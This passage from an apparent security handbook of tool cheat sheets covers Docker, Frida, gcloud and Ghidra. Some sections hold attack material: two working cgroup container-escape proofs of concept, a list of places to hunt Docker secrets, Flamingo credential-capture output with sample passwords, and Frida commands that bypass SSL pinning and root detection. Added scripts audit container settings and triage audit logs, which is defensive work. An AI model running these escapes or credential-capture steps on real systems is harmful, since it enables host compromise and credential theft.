docker rm $(docker ps --filter status=exited -qa) | Remove exited containers

DOCKERFILE
entrypoint: ["tail", "-f", "/dev/null"] | Change entrypoint to run nothing
RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone | Set timezone in Dockerfile
GitHub: Dockerfile-example-multiline | Define multiple line command

DOCKER COMPOSE
restart: always (Link: Compose file version 3 reference) | Change restart policy
$PWD/httpd/[Link]:/usr/local/apache2/conf/[Link]:ro (GitHub: sample-[Link]) | Mount file as volume
docker-compose up, docker-compose up -d | Start compose env
docker-compose down, docker-compose down -v | Stop compose env
docker-compose logs | Check logs

DOCKER CONTAINERS
docker run -p 4000:80 imgname | Start docker container
docker run -d -p 4000:80 imgname | Start docker container in detached mode
docker run --rm -it imgname sh | Start docker container and remove it on exit
docker exec -it [container-id] sh | Enter a running container
docker stop <hash> | Stop container
docker ps, docker ps -a | List all containers
docker rm <hash>, docker rm $(docker ps -a -q) | Remove container
docker kill <hash> | Force shutdown of one given container
docker login | Login to docker hub
docker run username/repo:tag | Run image from a given tag
docker logs --tail 5 $container_name | Tail container logs
docker inspect --format '{{.[Link]}}' $container_name | Check container healthcheck status
docker ps --filter "label=[Link]-[Link]" | List containers by labels

DOCKER IMAGES
docker images, docker images -a | List all images
docker build -t denny/image:<tag> . | Create docker image
docker push denny/image:<tag> | Push a tagged image to repo
docker history <image_name> | Show the history of an image
docker save <image_name> > my_img.tar | Export image to file
docker load -i my_img.tar | Load image to local registry
docker tag <image> username/repo:tag | Tag <image>

DOCKER SOCKETFILE
docker run -v /var/run/[Link]:/var/run/[Link] -it alpine sh | Run container mounting socket file
export DOCKER_HOST=unix:///my/[Link] | A different docker socket file
curl -XGET --unix-socket /var/run/[Link] [Link] | List containers
curl -XPOST --unix-socket /var/run/[Link] [Link]d>/stop | Stop container
curl -XPOST --unix-socket /var/run/[Link] [Link]d>/start | Start container
curl --unix-socket /var/run/[Link] [Link] | List events
curl -XPOST --unix-socket /var/run/[Link] -d '{"Image":"nginx:alpine"}' -H 'Content-Type: application/json' [Link] | Create container

DOCKER CONF
/var/lib/docker, /var/lib/docker/devicemapper/mnt | Docker files
~/Library/Containers/[Link]/Data/ | Docker for Mac

DOCKER STATUS
docker logs --tail 5 $container_name | Tail container logs
docker inspect --format '{{.[Link]}}' $container_name | Check container healthcheck status
docker ps | List containers
docker ps -a | List all containers
docker ps --filter "label=[Link]-[Link]" | List containers by labels
docker images -a | List all images

REFERENCE:
[Link]
100-article/62_article/Docker%20for%[Link]
[Link]
[Link]
[Link]

D D
DOCKER_Exploit

63
RED TEAM EXPLOITATION WINDOWS/LINUX

Docker Secrets Locations

If you gain access to a Docker container you can check the following locations for possible plaintext or encoded Docker passwords, API tokens, etc. that the container is using for external services.

You may be able to see Docker secret locations or names by issuing:

$ docker secret ls

Depending on the OS your target Docker container is running, check the following locations for secret files or mounts.

Linux Docker Secrets Locations:
/run/secrets/<secret_name>

Windows Docker Secrets Locations:
C:\ProgramData\Docker\internal\secrets
C:\ProgramData\Docker\secrets

Container Escape Abuse Linux cgroup v1:

# version of the PoC that launches ps on the host
# spawn a new container to exploit via
# docker run --rm -it --privileged ubuntu bash
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh\nps >'"$t/o" >/c;
chmod +x /c;sh -c "echo 0 >$d/w/[Link]";sleep 1;cat /o

The refined version of the exploit executes a ps aux command on the host and saves its output to the /output file in the container:

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/[Link]"
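
A defender's counterpart to the two escapes above, added here as an example that is not from the handbook or from Docker: both cgroup escapes require a container started with --privileged, or with CAP_SYS_ADMIN plus AppArmor set to unconfined, and the socket technique in the previous section requires the Docker socket bind-mounted into the container. This Python script reads the JSON that `docker inspect` prints for one or more containers and reports which of those conditions each container meets. The inspect output embedded below is constructed sample data; the field names it relies on (HostConfig.Privileged, HostConfig.CapAdd, HostConfig.SecurityOpt, HostConfig.Binds and Mounts[].Source) are the ones the Docker Engine API returns, and the finding labels are this example's own.

```python
import json
import sys

# Constructed sample of `docker inspect` output for three containers (not real hosts).
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/build-agent",
        "HostConfig": {
            "Privileged": True,
            "CapAdd": None,
            "SecurityOpt": None,
            "Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
        },
        "Mounts": [
            {"Type": "bind", "Source": "/var/run/docker.sock",
             "Destination": "/var/run/docker.sock"}
        ],
    },
    {
        "Name": "/web",
        "HostConfig": {
            "Privileged": False,
            "CapAdd": ["SYS_ADMIN"],
            "SecurityOpt": ["apparmor=unconfined"],
            "Binds": None,
        },
        "Mounts": [],
    },
    {
        "Name": "/quiet",
        "HostConfig": {"Privileged": False, "CapAdd": None,
                       "SecurityOpt": None, "Binds": None},
        "Mounts": [],
    },
])

DOCKER_SOCKET = "/var/run/docker.sock"


def audit_container(entry):
    """Return the sorted list of escape-enabling settings found on one inspect entry."""
    hc = entry.get("HostConfig") or {}
    findings = set()
    if hc.get("Privileged"):
        findings.add("privileged")            # --privileged: first PoC above
    for cap in hc.get("CapAdd") or []:
        if cap.upper().replace("CAP_", "") == "SYS_ADMIN":
            findings.add("cap_add:SYS_ADMIN")  # --cap-add=SYS_ADMIN: refined PoC
    for opt in hc.get("SecurityOpt") or []:
        if opt.lower() == "apparmor=unconfined":
            findings.add("apparmor_unconfined")
    # The socket can arrive either as a Binds string "src:dst[:opts]" or as a Mounts entry.
    sources = [m.get("Source") for m in entry.get("Mounts") or []]
    sources += [b.split(":")[0] for b in hc.get("Binds") or []]
    if DOCKER_SOCKET in sources:
        findings.add("docker_socket_mounted")
    return sorted(findings)


def audit(inspect_json):
    """Map container name -> findings for a whole `docker inspect` JSON array."""
    return {e["Name"].lstrip("/"): audit_container(e) for e in json.loads(inspect_json)}


if __name__ == "__main__":
    # Usage: docker inspect $(docker ps -q) | python3 audit_containers.py
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_INSPECT
    for name, findings in audit(data).items():
        print("%-20s %s" % (name, ", ".join(findings) or "ok"))
```

Run against live output with `docker inspect $(docker ps -q) | python3 audit_containers.py`; with no input on stdin the script audits the embedded sample. A container listed with `privileged`, or with both `cap_add:SYS_ADMIN` and `apparmor_unconfined`, is one the cgroup release_agent technique above would work from, and `docker_socket_mounted` means anything inside it can drive the daemon as in the DOCKER SOCKETFILE section.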

REFERENCE:
[Link]
escapes/

FLAMINGO
RED TEAM ESCALATE PRIV WINDOWS/LINUX
Flamingo captures credentials sprayed across the network by various IT and security products. It currently supports SSH, HTTP, LDAP, DNS, FTP, and SNMP credential collection.

Download the Flamingo binary from the releases page or build it from source:

$ GOOS=windows GOARCH=amd64 go build -o [Link]

$ go get -u -v [Link]/atredispartners/flamingo && \
  go install -v [Link]/atredispartners/flamingo && \
  $GOPATH/bin/flamingo

Run the binary and collect credentials:

C:\> [Link]

{"_etime":"2020-01-10T[Link]Z","_host":"[Link]:18301","_proto":"ssh","method":"pubkey","pubkey":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPVSxqrWfNle0nnJrKS3NA12uhu9PHxnP4OlD843tRz/","pubkey-sha256":"SHA256:/7UkXjk0XtBe9N6RrAGGgJTGuKKi1Hgk3E+4TPo54Cw","username":"devuser","version":"SSH-2.0-OpenSSH_for_Windows_7.7"}

{"_etime":"2020-01-10T[Link]Z","_host":"[Link]:1361","_proto":"ssh","method":"password","password":"SuperS3kr3t^!","username":"root","version":"SSH-2.0-OpenSSH_for_Windows_7.7"}

{"_etime":"2020-01-10T[Link]Z","_host":"[Link]:9992","_proto":"ssh","method":"password","password":"DefaultPotato","username":"vulnscan-a","version":"SSH-2.0-OpenSSH_for_Windows_7.7"}

**By default, credentials are logged to standard output and appended to [Link] in the working directory.

Options
--protocols configures the list of enabled protocol listeners.
Use additional options to specify ports and protocol options for listeners.
All additional command-line arguments are output destinations.

Outputs
Flamingo can write recorded credentials to a variety of output formats. By default, flamingo logs to [Link] and standard output.

Standard Output
Specifying - or stdout results in flamingo logging only to standard output.

File Destinations
Specifying one or more file paths results in flamingo appending to these files.

HTTP Destinations
Specifying HTTP or HTTPS URLs results in flamingo sending a webhook POST request to each endpoint. By default, this format supports platforms like Slack and Mattermost that accept inbound webhooks.
The actual HTTP POST looks like:

POST /specified-url
Content-Type: application/json
User-Agent: flamingo/v0.0.0

{"text": "full-json-output of credential report"}

Syslog Destinations
Specifying syslog or syslog:<parameters> results in flamingo sending credentials to a syslog server.
The following formats are supported:
• syslog - send to the default syslog output, typically a unix socket
• syslog:unix:/dev/log - send to a specific unix stream socket
• syslog:host - send to the specified host using udp and port 514
• syslog:host:port - send to the specified host using udp and the specified port
• syslog:udp:host - send to the specified host using udp and port 514
• syslog:udp:host:port - send to the specified host using udp and the specified port
• syslog:tcp:host - send to the specified host using tcp and port 514
• syslog:tcp:host:port - send to the specified host using tcp and the specified port
• syslog:tcp+tls:host - send to the specified host using tls over tcp and port 514
• syslog:tcp+tls:host:port - send to the specified host using tls over tcp and the specified port

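Flamingo's value to a blue team is the JSON it emits: each record is one product that just handed a credential to a listener it should not trust. The following Python is an added example, not code from Flamingo or the handbook. It turns the JSON-lines output into a compact alert record that keeps the source address, user and credential type but never the password itself, and it resolves the syslog destination strings listed above into a transport, host and port. The records embedded below are constructed in the shape of the samples above (constructed values, not captured credentials); the example assumes `_host` is the submitting client's address:port, which is what the sample output suggests.

```python
import json

# Constructed records in the shape of Flamingo's JSON-lines output; sample values only.
SAMPLE_LINES = [
    '{"_etime":"2020-01-10T08:00:00Z","_host":"10.0.0.5:18301","_proto":"ssh",'
    '"method":"pubkey","pubkey":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyOnly",'
    '"pubkey-sha256":"SHA256:ExampleFingerprintOnly","username":"devuser",'
    '"version":"SSH-2.0-OpenSSH_for_Windows_7.7"}',
    '{"_etime":"2020-01-10T08:00:01Z","_host":"10.0.0.5:1361","_proto":"ssh",'
    '"method":"password","password":"Winter2020!","username":"root",'
    '"version":"SSH-2.0-OpenSSH_for_Windows_7.7"}',
    "not a json record",
]

SYSLOG_TRANSPORTS = {"unix", "udp", "tcp", "tcp+tls"}


def summarize(line):
    """One Flamingo record -> alert dict without the secret, or None if the line is not JSON."""
    try:
        rec = json.loads(line)
    except json.JSONDecodeError:
        return None
    host, _, port = rec.get("_host", "").rpartition(":")
    method = rec.get("method")
    if method == "password":
        # Length only: enough to spot empty/default passwords, never the value itself.
        evidence = "password[len=%d]" % len(rec.get("password", ""))
    elif method == "pubkey":
        evidence = rec.get("pubkey-sha256", "")
    else:
        evidence = method or ""
    return {
        "time": rec.get("_etime"),
        "src_ip": host,
        "src_port": int(port) if port.isdigit() else None,
        "proto": rec.get("_proto"),
        "user": rec.get("username"),
        "client": rec.get("version"),
        "evidence": evidence,
    }


def summarize_all(lines):
    return [r for r in (summarize(l) for l in lines) if r is not None]


def parse_syslog_dest(spec):
    """Resolve a flamingo syslog destination string to (transport, host_or_path, port).

    Follows the formats listed on the page: bare 'syslog' is the default output,
    'unix' carries a socket path, a missing transport means udp, a missing port means 514.
    """
    if spec == "syslog":
        return ("unix", None, None)
    if not spec.startswith("syslog:"):
        raise ValueError("not a syslog destination: %r" % spec)
    parts = spec[len("syslog:"):].split(":")
    if parts[0] == "unix":
        return ("unix", ":".join(parts[1:]), None)
    if parts[0] in SYSLOG_TRANSPORTS:
        transport, rest = parts[0], parts[1:]
    else:
        transport, rest = "udp", parts
    if len(rest) == 1:
        return (transport, rest[0], 514)
    if len(rest) == 2 and rest[1].isdigit():
        return (transport, rest[0], int(rest[1]))
    raise ValueError("malformed syslog destination: %r" % spec)


if __name__ == "__main__":
    for alert in summarize_all(SAMPLE_LINES):
        print(alert)
    print(parse_syslog_dest("syslog:tcp+tls:collector.example.net:6514"))
```

Feed real output with `python3 flamingo_alerts.py < flamingo.log` after replacing `SAMPLE_LINES` with `sys.stdin`; the point of the redaction is that the alert can go to a ticketing system or chat webhook without re-broadcasting the sprayed password.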
REFERENCE:
[Link]
[Link]
[Link]

FRIDA
RED TEAM VULNERABILITY ALL
Frida is a dynamic code instrumentation toolkit. It lets you inject snippets of JavaScript or your own library into native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX.

Listing frida available devices

frida-ls-devices

Getting frida server running on device

download latest binary from frida releases
adb shell "su -c 'chmod 755 /data/local/tmp/frida-server'"
adb shell "su -c '/data/local/tmp/frida-server' &"

Trace open calls in chrome

frida-trace -U -i open [Link]

FRIDA-CLI
Connect to application and start debugging
frida -U <APP NAME>

Loading a script
frida Calculator -l [Link]
#add --debug for more debugging symbols

Connect and list running processes

frida-ps -U

Connect and list running applications

frida-ps -Ua

Connect and list installed applications

frida-ps -Uai

Connect to specific device

frida-ps -D 0216027d1d6d3a03

If/when troubleshooting the Brida to frida bridge

frida -U -f [Link] -l ~/bin/proxies/[Link] --no-pause
NOTE: Turn off Magisk hiding in settings, as this causes issues with the Brida and frida link.

iOS
NOTE: For non-jailbroken iPhones, the frida gadget technique is the way to go: recompile the app with the frida gadget embedded.

iOS getting list of applications

#run this on the device
ipainstaller -l > [Link]

Get active window

w = [Link]()
#This returns an address such as: 0xd43321
#Now drill into this window with:
desc = [Link]().toString()

Refactor into one-liner:

frida -q -U evilapp -e "[Link]().recursiveDescription().toString();" | grep "UILabel.*hidden"

FRIDA SCRIPTS
SSL pinning bypass (android - via frida codeshare)
frida --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f YOUR_BINARY
frida --codeshare segura2010/android-certificate-pinning-bypass -f YOUR_BINARY
frida --codeshare sowdust/universal-android-ssl-pinning-bypass-2 -f YOUR_BINARY

Anti-root bypass (android - via frida codeshare)
frida --codeshare dzonerzy/fridantiroot -f YOUR_BINARY

Obj-C method observer
frida --codeshare mrmacete/objc-method-observer -f YOUR_BINARY

Get stack trace in your hook (android)
frida --codeshare razaina/get-a-stack-trace-in-your-hook -f YOUR_BINARY

Bypass network security config (android)
frida --codeshare tiiime/android-network-security-config-bypass -f YOUR_BINARY

Extract android keystore
frida --codeshare ceres-c/extract-keystore -f YOUR_BINARY

iOS backtrace http requests
frida --codeshare SYM01/ios-backtrace-http-req -f YOUR_BINARY

iOS trustkit SSL unpinning
frida --codeshare platix/ios-trustkit-ssl-unpinning -f YOUR_BINARY

iOS SSL bypass
frida --codeshare lichao890427/ios-ssl-bypass -f YOUR_BINARY

iOS 12 SSL bypass
frida --codeshare machoreverser/ios12-ssl-bypass -f YOUR_BINARY

iOS SSL pinning disable
frida --codeshare snooze6/ios-pinning-disable -f YOUR_BINARY

iOS & Android enumeration script
frida --codeshare snooze6/everything -f YOUR_BINARY

REFERENCE:
Twitter> @gh0s7
[Link]
[Link]
[Link]

GCP CLI
ALL ADMINISTRATION CLOUD
gcloud CLI manages authentication, local configuration, developer workflow, and interactions with Google Cloud APIs.

COMMAND                                                              DESCRIPTION
BASICS
[Link]                                                               gcloud Doc
[Link]                                                               gsutil Installation
[Link]                                                               Installation
gcloud version, gcloud info, gcloud components list                  Check version & settings
gcloud init                                                          Init profile
#This will ask you to open an OpenID URL
gcloud compute zones list                                            List all zones
gcloud components update, gcloud components update --version 219.0.1
                                                                     Upgrade local SDK

BUCKET BASICS
gsutil ls, gsutil ls -lh gs://<bucket-name>                          List all buckets and files
gsutil cp gs://<bucket-name>/<dir-path>/package-[Link] .             Download file
gsutil cp <filename> gs://<bucket-name>/<directory>/                 Upload file
gsutil cat gs://<bucket-name>/<filepath>/                            Cat file
gsutil rm gs://<bucket-name>/<filepath>                              Delete file
gsutil mv <src-filepath> gs://<bucket-name>/<directory>/<dest-filepath>
                                                                     Move file
gsutil cp -r ./conf gs://<bucket-name>/                              Copy folder
gsutil du -h gs://<bucket-name>/<directory>                          Show disk usage
gsutil mb gs://<bucket-name>                                         Create bucket
gsha1sum [Link], shasum syslog-[Link]                                Calculate file sha1sum
gsutil help, gsutil help cp, gsutil help options                     Gsutil help

GCP PROJECT
gcloud config list, gcloud config list project                       List projects
gcloud compute project-info describe                                 Show project info
gcloud config set project <project-id>                               Switch project

GKE
gcloud auth list                                                     Display a list of credentialed accounts
gcloud config set account <ACCOUNT>                                  Set the active account
gcloud container clusters get-credentials <cluster-name>             Set kubectl context
gcloud config set compute/region us-west                             Change region
gcloud config set compute/zone us-west1-b                            Change zone
gcloud container clusters list                                       List all container clusters

IAM
gcloud auth activate-service-account --key-file <key-file>           Authenticate client
gcloud auth list                                                     Display a list of credentialed accounts
gcloud config set account <ACCOUNT>                                  Set the active account
gcloud auth configure-docker                                         Auth to GCP Container Registry
gcloud auth print-access-token, gcloud auth print-refresh-token      Print token for active account
gcloud auth <application-default> revoke                             Revoke previously generated credential

BUCKET SECURITY
gsutil -m acl set -R -a public-read gs://<bucket-name>/              Make all files readable
gsutil config -a                                                     Config auth
gsutil iam ch user:denny@[Link]:objectCreator,objectViewer gs://<bucket-name>
                                                                     Grant bucket access
gsutil iam ch -d user:denny@[Link]:objectCreator,objectViewer gs://<bucket-name>
                                                                     Remove bucket access

INSTANCE
gcloud compute instances list, gcloud compute instance-templates list
                                                                     List all instances
gcloud compute instances describe "<instance-name>" --project "<project-name>" --zone "us-west2-a"
                                                                     Show instance info
gcloud compute instances stop instance-2                             Stop an instance
gcloud compute instances start instance-2                            Start an instance
gcloud compute instances create vm1 --image image-1 --tags test --zone "<zone>" --machine-type f1-micro
                                                                     Create an instance
gcloud compute ssh --project "<project-name>" --zone "<zone-name>" "<instance-name>"
                                                                     SSH to instance
gcloud compute copy-files example-instance:~/REMOTE-DIR ~/LOCAL-DIR --zone us-central1-a
                                                                     Download files
gcloud compute copy-files ~/LOCAL-FILE-1 example-instance:~/REMOTE-DIR --zone us-central1-a
                                                                     Upload files

DISKS/VOLUMES
gcloud compute disks list                                            List all disks
gcloud compute disk-types list                                       List all disk types
gcloud compute snapshots list                                        List all snapshots
gcloud compute disks snapshot <diskname> --snapshotname <name1> --zone $zone
                                                                     Create snapshot

NETWORK
gcloud compute networks list                                         List all networks
gcloud compute networks describe <network-name> --format json        Detail of one network
gcloud compute networks create <network-name>                        Create network
gcloud compute networks subnets create subnet1 --network net1 --range [Link]/24
                                                                     Create subnet
gcloud compute addresses create --region us-west2-a vpn-1-static-ip  Get a static ip
gcloud compute addresses list                                        List all ip addresses
gcloud compute addresses describe <ip-name> --region us-central1     Describe ip address
gcloud compute routes list                                           List all routes

DNS
gcloud dns record-sets list --zone my_zone                           List of all record-sets in myzone
gcloud dns record-sets list --zone my_zone --limit=10                List first 10 DNS records

FIREWALL
gcloud compute firewall-rules list                                   List all firewall rules
gcloud compute forwarding-rules list                                 List all forwarding rules
gcloud compute firewall-rules describe <rule-name>                   Describe one firewall rule
gcloud compute firewall-rules create my-rule --network default --allow tcp:9200 tcp:3306
                                                                     Create one firewall rule
gcloud compute firewall-rules update default --network default --allow tcp:9200 tcp:9300
                                                                     Update one firewall rule

IMAGES/CONTAINERS
gcloud compute images list                                           List all images
gcloud container clusters list                                       List all container clusters
gcloud container clusters get-credentials <cluster-name>             Set kubectl context

RDS
gcloud sql instances list                                            List all sql instances

SERVICES
gcloud compute backend-services list                                 List my backend services
gcloud compute http-health-checks list                               List all my health check endpoints
gcloud compute url-maps list                                         List all URL maps

REFERENCE:
[Link]

GCP_Defend
BLUE TEAM LOGGING CLOUD

Security-related logs
Logs provide a rich data set to help identify specific security events. Each of the following log sources might provide details that you can use in your analysis.

Cloud Audit Logs
Google Cloud services write audit logs called Cloud Audit Logs. These logs help you answer the questions "Who did what, where, and when?" There are three types of audit logs for each project, folder, and organization: Admin Activity, Data Access, and System Event. These logs collectively help you understand what administrative API calls were made, what data was accessed, and what system events occurred. This information is critical for any analysis. For a list of Google Cloud services that provide audit logs, see Google services with audit logs.

Cloud Audit Logs for GKE also exposes Kubernetes Audit Logging, which provides a chronological record of calls made to the Kubernetes API server. These logs are also collected in Cloud Audit Logs.

App logs
Stackdriver Logging collects your container standard output and error logs. You can add other logs by using the Sidecar approach. For clusters with Istio and Stackdriver enabled, the Istio Stackdriver adapter collects and reports the Istio-specific logs and sends the logs to Stackdriver Logging.

Infrastructure logs
Infrastructure logs offer insight into the activities and events at the OS, cluster, and networking levels.

GKE audit logs
GKE sends two types of audit logs: GKE audit logs and Kubernetes Audit Logging. Kubernetes writes audit logs to Cloud Audit Logs for calls made to the Kubernetes API server. Kubernetes audit log entries are useful for investigating suspicious API requests, for collecting statistics, and for creating monitoring alerts for unwanted API calls. In addition, GKE writes its own audit logs that identify what occurs in a GKE cluster.

Compute Engine Cloud Audit Logs for GKE nodes
GKE runs on top of Compute Engine nodes, which generate their own audit logs. In addition, you can configure auditd to capture Linux system logs. auditd provides valuable information such as error messages, login attempts, and binary executions for your cluster nodes. Both the Compute Engine audit logs and the auditd audit logs provide insight into activities that happen at the underlying cluster infrastructure level.

Container logs
For container and system logs, GKE deploys a per-node logging agent that reads container logs, adds helpful metadata, and then stores the logs. The logging agent checks for container logs in the following sources:

• Standard output and standard error logs from containerized processes
• kubelet and container runtime logs
• Logs for system components, such as VM startup scripts

For events, GKE uses a deployment in the kube-system namespace that automatically collects events and sends them to Logging. Logs are collected for clusters, nodes, pods, and containers.

Istio on Google Kubernetes Engine
For clusters with Istio, the Istio Stackdriver adapter is installed during cluster creation, which sends metrics, logging, and trace data from your mesh to Stackdriver.

Auditd for Container-Optimized OS on GKE
For Linux systems, the auditd daemon provides access to OS system-level commands and can provide valuable insight into the events inside your containers. On GKE, you can collect auditd logs and send them to Logging.

VPC Flow Logs
VPC Flow Logs records a sample of network flows sent from and received by VM instances. This information is useful for analyzing network communication. VPC Flow Logs includes all pod-to-pod traffic through the Intranode Visibility feature in your Kubernetes cluster.

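The "who did what, where, and when" questions above map onto fixed fields of a Cloud Audit Log entry, and the Kubernetes API calls GKE forwards arrive in the same shape. The following Python is an added example (not from Google's documentation or the handbook) that pulls those four answers out of exported LogEntry JSON, labels which of the three audit log types each entry came from, and flags calls worth an alert. The three entries embedded below are constructed samples; the field paths used (timestamp, logName, protoPayload.methodName, protoPayload.resourceName, protoPayload.authenticationInfo.principalEmail, protoPayload.requestMetadata.callerIp) are the ones Cloud Audit Logs populate, while the list of high-risk methods and the ".secrets." heuristic are this example's own choices.

```python
import json

# Constructed Cloud Audit Log entries as exported by Cloud Logging (sample values only).
SAMPLE_ENTRIES = [
    json.dumps({
        "logName": "projects/example-proj/logs/cloudaudit.googleapis.com%2Factivity",
        "timestamp": "2020-03-01T12:00:00Z",
        "protoPayload": {
            "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
            "serviceName": "cloudresourcemanager.googleapis.com",
            "methodName": "SetIamPolicy",
            "resourceName": "projects/example-proj",
            "authenticationInfo": {"principalEmail": "alice@example.com"},
            "requestMetadata": {"callerIp": "203.0.113.10"},
        },
    }),
    json.dumps({
        "logName": "projects/example-proj/logs/cloudaudit.googleapis.com%2Fdata_access",
        "timestamp": "2020-03-01T12:05:00Z",
        "protoPayload": {
            "serviceName": "storage.googleapis.com",
            "methodName": "storage.objects.get",
            "resourceName": "projects/_/buckets/backups/objects/db.sql",
            "authenticationInfo": {"principalEmail": "svc-backup@example-proj.iam.gserviceaccount.com"},
            "requestMetadata": {"callerIp": "10.128.0.7"},
        },
    }),
    json.dumps({
        # Kubernetes API call forwarded by GKE into Cloud Audit Logs
        "logName": "projects/example-proj/logs/cloudaudit.googleapis.com%2Factivity",
        "timestamp": "2020-03-01T12:10:00Z",
        "protoPayload": {
            "serviceName": "k8s.io",
            "methodName": "io.k8s.core.v1.secrets.list",
            "resourceName": "core/v1/namespaces/prod/secrets",
            "authenticationInfo": {"principalEmail": "bob@example.com"},
            "requestMetadata": {"callerIp": "198.51.100.4"},
        },
    }),
]

# Example's own watch list: calls that change who can do what, or read secret material.
HIGH_RISK_METHODS = {
    "SetIamPolicy",
    "google.iam.admin.v1.CreateServiceAccountKey",
}


def audit_log_type(log_name):
    """'activity', 'data_access' or 'system_event' from the %2F-encoded logName suffix."""
    return log_name.rsplit("%2F", 1)[-1]


def is_high_risk(method):
    return method in HIGH_RISK_METHODS or ".secrets." in method


def summarize(entry_json):
    """Answer who / what / where / when (and from which IP) for one LogEntry."""
    e = json.loads(entry_json)
    p = e.get("protoPayload", {})
    method = p.get("methodName", "")
    return {
        "when": e.get("timestamp"),
        "who": p.get("authenticationInfo", {}).get("principalEmail"),
        "what": method,
        "where": p.get("resourceName"),
        "from_ip": p.get("requestMetadata", {}).get("callerIp"),
        "log": audit_log_type(e.get("logName", "")),
        "high_risk": is_high_risk(method),
    }


def triage(entries):
    """Return (high-risk rows, all rows) for a batch of exported entries."""
    rows = [summarize(x) for x in entries]
    return [r for r in rows if r["high_risk"]], rows


if __name__ == "__main__":
    flagged, _ = triage(SAMPLE_ENTRIES)
    for r in flagged:
        print("%(when)s %(who)s %(what)s on %(where)s from %(from_ip)s" % r)
```

Exported entries from `gcloud logging read 'logName:"cloudaudit.googleapis.com"' --format json` are a JSON array of objects in this shape, so `triage([json.dumps(e) for e in array])` applies it directly; note that Data Access logs are off by default for most services, so an empty `data_access` result usually means they were never enabled rather than that nothing was read.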
REFERENCE:

[Link]
for-GKE-apps

GCP_Exploit
RED TEAM EXPLOITATION CLOUD

SCOUT
Scout Suite is an open source multi-cloud security-auditing tool that enables security posture assessment of cloud environments.

STEP 1: Download and install the gcloud command-line tool:
[Link]

STEP 2: Set the obtained target creds in your configuration:
gcloud config set account <account>

STEP 3: Execute 'scout' using a user account or service account:

$ python [Link] --provider gcp --user-account

$ python [Link] --provider gcp --service-account --key-file /path/to/keyfile

STEP 4: To scope the scan to a GCP organization, folder, or project, add one of the following:
Organization: --organization-id <ORGANIZATION_ID>
Folder: --folder-id <FOLDER_ID>
Project: --project-id <PROJECT_ID>

REFERENCE:
[Link]
functions-security
[Link]
[Link]
privileges-in-google-cloud-platform/

GCP_Hardening
BLUE TEAM CONFIGURATION CLOUD

GKE Hardening Guide
[Link]
your-cluster

GCP_Terms
ALL INFORMATIONAL CLOUD

Google Cloud Developers Cheat Sheet
[Link]
[Link]
google-cloud-products/

GHIDRA
RED/BLUE TEAM REVERSE ENGINEER BINARIES
Ghidra is a software reverse engineering framework developed by the NSA and used inside the agency for more than a decade. A software reverse engineering tool lets you reconstruct readable code from a proprietary binary, which in turn gives you the ability to detect malware behaviour or potential bugs.

ACTION                                  SHORTCUT        MENU
PROJECT/PROGRAM
New Project                             Ctrl+N          File → New Project
Open Project                            Ctrl+O          File → Open Project
Close Project                           Ctrl+W          File → Close Project
Save Project                            Ctrl+S          File → Save Project
Import File                             I               File → Import File
Export Program                          O               File → Export Program
Open File System                        Ctrl+I          File → Open File System
NAVIGATION
Go To                                   G               Navigation → Go To
Back                                    Alt+←
Forward                                 Alt+→
Toggle Direction                        Ctrl+Alt+T      Navigation → Toggle Code Unit Search Direction
Next Instruction                        Ctrl+Alt+I      Navigation → Next Instruction
Next Data                               Ctrl+Alt+D      Navigation → Next Data
Next Undefined                          Ctrl+Alt+U      Navigation → Next Undefined
Next Label                              Ctrl+Alt+L      Navigation → Next Label
Next Function                           Ctrl+Alt+F      Navigation → Next Function
Previous Function                       Ctrl+↑          Navigation → Go To Previous Function
Next Non-function Instruction           Ctrl+Alt+N      Navigation → Next Instruction Not In a Function
Next Different Byte Value               Ctrl+Alt+V      Navigation → Next Different Byte Value
Next Bookmark                           Ctrl+Alt+B      Navigation → Next Bookmark
MARKUP
Undo                                    Ctrl+Z          Edit → Undo
Redo                                    Ctrl+Shift+Z    Edit → Redo
Save Program                            Ctrl+S          File → Save program name
Disassemble                             D               ❖ → Disassemble
Clear Code/Data                         C               ❖ → Clear Code Bytes
Add Label (Address field)               L               ❖ → Add Label
Edit Label (Label field)                L               ❖ → Edit Label
Rename Function (Function name field)   L               ❖ → Function → Rename Function
Remove Label (Label field)              Del             ❖ → Remove Label
Remove Function (Function name field)   Del             ❖ → Function → Delete Function
Define Data                             T               ❖ → Data → Choose Data Type
Repeat Define Data                      Y               ❖ → Data → Last Used: type
Rename Variable (Variable in decompiler)    L           ❖ → Rename Variable
Retype Variable (Variable in decompiler)    Ctrl+L      ❖ → Retype Variable
Cycle Integer Types                     B               ❖ → Data → Cycle → byte, word, dword, qword
Cycle String Types                      '               ❖ → Data → Cycle → char, string, unicode
Cycle Float Types                       F               ❖ → Data → Cycle → float, double
Create Array                            [               ❖ → Data → Create Array
Create Pointer                          P               ❖ → Data → pointer
Create Structure (Selection of data)    Shift+[         ❖ → Data → Create Structure
New Structure (Data type container)                     ❖ → New → Structure
Import C Header                                         File → Parse C Source
Cross References                                        ❖ → References → Show References to context
WINDOWS
Bookmarks                               Ctrl+B          Window → Bookmarks
Byte Viewer                                             Window → Bytes: program name
Function Call Trees
Data Types                                              Window → Data Type Manager
Decompiler                              Ctrl+E          Window → Decompile: function name
Function Graph                                          Window → Function Graph
Script Manager                                          Window → Script Manager
Memory Map                                              Window → Memory Map
Register Values                         V               Window → Register Manager
